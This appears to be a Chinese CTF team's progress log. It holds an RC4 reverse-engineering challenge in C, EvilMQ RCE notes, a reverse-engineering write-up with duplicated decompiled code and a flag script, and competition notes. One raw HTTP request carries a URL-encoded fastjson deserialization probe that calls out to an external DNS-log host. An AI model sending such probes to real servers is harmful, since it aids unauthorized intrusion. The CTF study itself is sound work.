#逆向RC4
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
typedef unsigned long ULONG; /* length type main() uses for the ciphertext size (strlen result) */

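void init(unsigned char *s, unsigned char *key, unsigned long Len) //初始化函数
{
    /* RC4 key scheduling (KSA).
     *
     * Fills s[0..255] with the identity permutation and then permutes it
     * under control of the key, which is repeated cyclically to 256 bytes.
     *
     * s   - 256-byte state array, fully overwritten
     * key - Len key bytes
     * Len - key length; a zero-length key is treated as an all-zero key
     *       (the naive key[i % Len] would otherwise divide by zero)
     *
     * k is unsigned char on purpose: with a plain char, a key byte >= 0x80
     * turns negative, j can go negative and s[j] indexes out of bounds.
     */
    unsigned char k[256];
    int j = 0;

    for (int i = 0; i < 256; i++) {
        s[i] = (unsigned char)i;
        k[i] = (Len != 0) ? key[i % Len] : 0;
    }
    for (int i = 0; i < 256; i++) {
        /* every operand is in 0..255, so j stays within 0..255 */
        j = (j + s[i] + k[i]) % 256;
        unsigned char tmp = s[i];
        s[i] = s[j]; //交换s[i]和s[j]
        s[j] = tmp;
    }
}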

void crypt(unsigned char *s, unsigned char *Data, unsigned long Len) //加解密
{
    /* RC4 keystream generation (PRGA) applied in place.
     *
     * Advances the state s and XORs each keystream byte into Data. RC4 is
     * symmetric, so the same call both encrypts and decrypts.
     *
     * s    - 256-byte state produced by init(); mutated as it is consumed
     * Data - Len bytes transformed in place
     */
    int x = 0, y = 0;

    for (unsigned long pos = 0; pos < Len; pos++) {
        x = (x + 1) & 0xFF;
        y = (y + s[x]) & 0xFF;

        unsigned char swap = s[x]; //交换s[x]和s[y]
        s[x] = s[y];
        s[y] = swap;

        Data[pos] ^= s[(s[x] + s[y]) & 0xFF];
    }
}

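int main()
{
    /* Challenge harness: read one line from stdin, RC4-transform the
     * embedded byte array in place with the key "12345678", and report
     * whether the input matches the result. */
    unsigned char s[256] = {0}; //S-box
    char key[256] = "12345678";
    char pData[512] = {-17,-64,87,-117,125,-39,-18,-46,-59,114,100,-85,-7,8,105,-63,45,-22,-12,36,-84,27};
    char input[512] = {0};
    ULONG len = strlen(pData);
    int a = 0;
    int c; /* int, not char: getchar() returns EOF as well as 0..255 */

    printf("please input your flag:\n");
    /* Stop at newline or EOF (a char loop variable never equals EOF and
     * spins forever), and never write past input[] - extra bytes are dropped,
     * leaving room for the terminating NUL. */
    while ((c = getchar()) != '\n' && c != EOF) {
        if (a < (int)sizeof input - 1) {
            input[a++] = (char)c;
        }
    }
    input[a] = '\0';

    init(s, (unsigned char *)key, strlen(key)); //已经完成了初始化
    crypt(s, (unsigned char *)pData, len);//加密

    if (!strcmp(input, pData)) {
        printf("Good!");
    } else {
        printf("ERROR!");
    }
    return 0;
}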

原文

https://gzyinfosec.feishu.cn/docx/JVqtdSF9CoB7IxxOVBWcDG0xnrd?from=from_copylink

时间进度

1月20日—1月28日

制定学习计划

C语言 · 启航

施行学习计划

设置学习打卡机制

22日晚观看赛前说明会

靶场试炼

安排任务

题目讲解

开发飞书机器人实现自动递交flag验证

RE手

逆向、汇编学习进展

PWN手

Pwn、Linux学习进展


召开一周总结

漏洞挖掘

发掘安卓底层漏洞,上报MISRC并获得致谢。

战队声望

在CTF知名网站获悉,GZYSEC排名

赛事状况

期间参加獬豸杯,据悉此次电子取证大赛由江西警察学院科技与信息安全系火炬木攻防实验室等单位主办

受长亭科技邀请参与 Real World CTF 6(th) 体验赛

EvilMQ

  1. 漏洞原理类似 ActiveMQ, 但属于 Client 端 RCE, 需要自己构造一个 Evil Server

https://exp10it.io/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/

  1. 几个关键点

https://github.com/apache/inlong/blob/9d745b8449b8f57573668d7c332a71179027be20/inlong-tubemq/tubemq-core/src/main/java/org/apache/inlong/tubemq/corerpc/netty/NettyClient.java#L349

https://github.com/apache/inlong/blob/master/inlong-tubemq/tubemq-core/src/main/java/org/apache/inlong/tubemq/corerpc/utils/MixUtils.java#L70

1月29日—2月4日

复现

搭建赛事复现环境

笔记

参与编写逆向笔记

Hgame

29日参与Hgame

西湖

30日参加西湖论剑大赛

RE

web

GET /jshERP-boot/user/list?search=%7b%22%40%74%79%70%65%22%3a%22%6a%61%76%61%2e%6e%65%74%2e%49%6e%65%74%34%41%64%64%72%65%73%73%22%2c%22%76%61%6c%22%3a%22%73%61%74%76%65%72%70%76%79%6e%2e%64%67%72%68%33%2e%63%6e%22%7d&column=createTime&order=desc&field=id,,,action,loginName,username,userType,roleName,orgAbr,leaderFlagStr,phonenum,userBlngOrgaDsplSeq,status&currentPage=1&pageSize=10 HTTP/1.1
Host: 1.14.108.193:31882
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Access-Token: ea4b6df790ab427d9564d16cf7fee026_0
Connection: close
Referer: http://1.14.108.193:31882/system/user
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1706583502; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1706583724

测试赛

自建靶机:Web测试

2024.0xctf.org.cn

2月05日—2月11日

总结

自主学习总结

逆向手

「本周做的哪些事情【简要总结】

web基础的了解,汇编的了解,内存占用,C语言前八道二级设计题以及文件的打开,高级进阶函数和树的结构和堆栈,高数的前七章节的复习,西湖赛事题目的了解以及复盘,虽然说现在还没怎么懂。

PWN手

密码手

除夕红包赛

2月9日红包赛

代码能力测试

2月10日代码能力测试

2月12日—2月18日

铁人三项环境复现

2月15日根据铁人三项杯搭建环境复现

逆向

放入ida,发现众多函数,查找字符串定位函数。

v26 = 0;
  v4 = 1;
  v5 = 4;
  v6 = 14;
  v7 = 10;
  v8 = 5;
  v9 = 36;
  v10 = 23;
  v11 = 42;
  v12 = 13;
  v13 = 19;
  v14 = 28;
  v15 = 13;
  v16 = 27;
  v17 = 39;
  v18 = 48;
  v19 = 41;
  v20 = 42;
  v21 = 26;
  v22 = 20;
  v23 = 59;
  v24 = 4;
  v25 = 0;
  printf("please enter flag:");
  sub_411136();
  while ( 1 )
  {
    getch();
    v1 = sub_411136();
    v27[v26] = v1;
    if ( !v1 || v27[v26] == 13 )
      break;
    if ( v27[v26] == 8 )
    {
      printf("\b\b");
      sub_411136();
      --v26;
    }
    else
    {
      printf("%c", v27[v26]);
      sub_411136();
      ++v26;
    }
  }
  v3 = 0;
  for ( i = 0; i < 17; ++i )
  {
    if ( v27[i] != byte_415768[*(&v4 + i)] )//KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138
      v3 = 1;
  }
  if ( v28 != '1' || v29 != '0' || v30 != '2' || v31 != '4' || v32 != '}' )
    v3 = 1;
  v27[v26] = 0;
  printf("\r\n");v26 = 0;
  v4 = 1;
  v5 = 4;
  v6 = 14;
  v7 = 10;
  v8 = 5;
  v9 = 36;
  v10 = 23;
  v11 = 42;
  v12 = 13;
  v13 = 19;
  v14 = 28;
  v15 = 13;
  v16 = 27;
  v17 = 39;
  v18 = 48;
  v19 = 41;
  v20 = 42;
  v21 = 26;
  v22 = 20;
  v23 = 59;
  v24 = 4;
  v25 = 0;
  printf("please enter flag:");
  sub_411136();
  while ( 1 )
  {
    getch();
    v1 = sub_411136();
    v27[v26] = v1;
    if ( !v1 || v27[v26] == 13 )
      break;
    if ( v27[v26] == 8 )
    {
      printf("\b\b");
      sub_411136();
      --v26;
    }
    else
    {
      printf("%c", v27[v26]);
      sub_411136();
      ++v26;
    }
  }
  v3 = 0;
  for ( i = 0; i < 17; ++i )
  {
    if ( v27[i] != byte_415768[*(&v4 + i)] )//KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138
      v3 = 1;
  }
  if ( v28 != '1' || v29 != '0' || v30 != '2' || v31 != '4' || v32 != '}' )
    v3 = 1;
  v27[v26] = 0;
  printf("\r\n");

将字符串按照数组v4的数字取出与v27比较,如果相等,则success。

v4数组即最上方连续的一串整型变量(1,4,14,10,5,36,23,42,13,19,28,13,27,39,48,41,42,26,20,59),相应的字符串为KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138,v27最后几位也就是1024},根据过程编写脚本。

# Rebuild the flag body: for each of the first 17 entries of `index`, take the
# single character at that 1-based position in `st`.
st = 'KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138'
index = (1, 4, 14, 10, 5, 36, 23, 42, 13, 19, 28, 13, 27, 39, 48, 41, 42, 26, 20, 59)

flag = ''.join(st[pos - 1] for pos in index[:17])

print(flag)

flag:KEY{e2s6ry3r5s8f61024}

研究C Sharp逆向工程

VNCTF

2月17日参加VNCTF

2月19日—2月25日

总结

  我最近自从西湖比完之后都是准备专升本的英语备考当中,从新概念一开始学起,每天背单词记笔记、听听力、默写单词、句子、回译文章,偶尔也会打打一些热身赛CTF水水,最近还给他们安排了一下目标。

  目前的学习计划

  Re手

密码手

PWN手